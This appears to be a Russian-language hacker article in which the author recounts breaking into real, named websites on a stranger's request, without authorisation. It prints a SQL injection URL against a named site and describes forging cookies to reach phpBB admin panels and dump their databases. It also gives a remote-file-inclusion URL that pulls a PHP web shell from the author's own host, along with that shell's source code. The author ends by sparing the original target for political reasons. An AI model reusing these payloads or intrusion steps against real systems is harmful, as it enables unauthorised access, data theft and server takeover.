Статья о хакинге, но без традиционного happy end

 

Привет, ты навеное думаешь что это какая-то опечатка или прикол.
Совсем нет. Обычно хакеры пишут статьи с заголовками ""Как был взломан ..."
В этой статье речь пойдет тоже о хакинге, но без традиционного happy end. Хотя как знать...

Как-то на днях мне в асю стучит чел с предложением добыть ему доступ к одному ресурсу.
Делать мне было особо нечего и я согласился. Просмотрев данный им урл, я увидел немного интересной инфы:
http://www.russianspain.com/phpinfo.php
и соответсвенно:
http://www.russianspain.com/php.ini

Полазив по сайту, я нашел еще возможность выполнения sql-инъекции, но сообщения об ошибке не выводились, и я решил оставить это на потом.
Пробив ip сайта, я увидел что на нем числилось еще 400 с лишним сайтов. Я методично решил их перебирать, пока не найду бажный.
Несколько раз мне попадались форумы phpBB второй ветки, но sql-инъекция резалась во всех. Подменив куки я получил доступ к админкам, и сбекапил базы в надежде что один из паролей подойдет и к фтп.
Один раз попался Advanced Guestbook 2.2, инъкция для доступа к админке работала, но для доступа и редактирования template требовалось еще валидный параметр session, поэтому меня постоянно выбрасыло на страницу авторизации.
Было еще несколько сайтов с возможностью sql-инъекции, типа:
http://www.joehenke.com/gallery_view.php?galleryid=16+UNION+SELECT+1/*
но вытянуть из них что-то путное мне сразу не удалось.

Так длилось до того момента, пока я не набрел на up-glass.com, сайт компании "Унипак", производящей тару для алкогольной промышленности России.
Увидев что файлы инклудятся, я попытался подключить свой шелл на narod.ru:
http://up-glass.com/former.php?folder=http://durito.narod.ru/sh&cmd=ls

Сервер выдал сообщение об ошибке:
Warning: lmenu(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /home/upglass/public_html/func.php on line 40

Warning: lmenu(http://durito.narod.ru/sh/config.p): failed to open stream: Success in /home/upglass/public_html/func.php on line 40

Все стало сразу ясно, я быстро залил на свой сайт файл config.p вот с таким содержимым:
<?
echo "<DIV align=left><PRE>";
system($_GET['cmd']);
echo "</PRE></DIV>";
?>

и следующий запрос:
http://up-glass.com/former.php?folder=http://durito.narod.ru/&cmd=ls
уже выдал мне список файлов сайта

 

Но просматривать директории других юзеров я не мог, даже public_html был мне не доступен.

Ядро было свежим:
Linux cpanel05.gzo.com 2.6.11.11 #1 SMP Tue May 31 14:02:19 CDT 2005 i686 i686 i386 GNU/Linux
о руте можно было бы забыть.

Тогда я решил вернуться к sql-инъекции на www.russianspain.com. И только сейчас случайно бросил взляд на контент сайта.
Я увидел, что взляды создателей сайта относительно президента РФ и его политики очень близки моим. Прочитав статьи я твердо решил оставить один из последних свободных голосов оппозиции в покое.
Мало того, я отписал им о уязвимостях на сайте, и попросил вывесить баннер "Хватит Путина!".

Вот такая история.


Твой bug Durito.
_________________
EAT THE RICH!


Дата створення/оновлення: 25.05.2018

stop war in Ukraine

ukrTrident

stand with Ukraine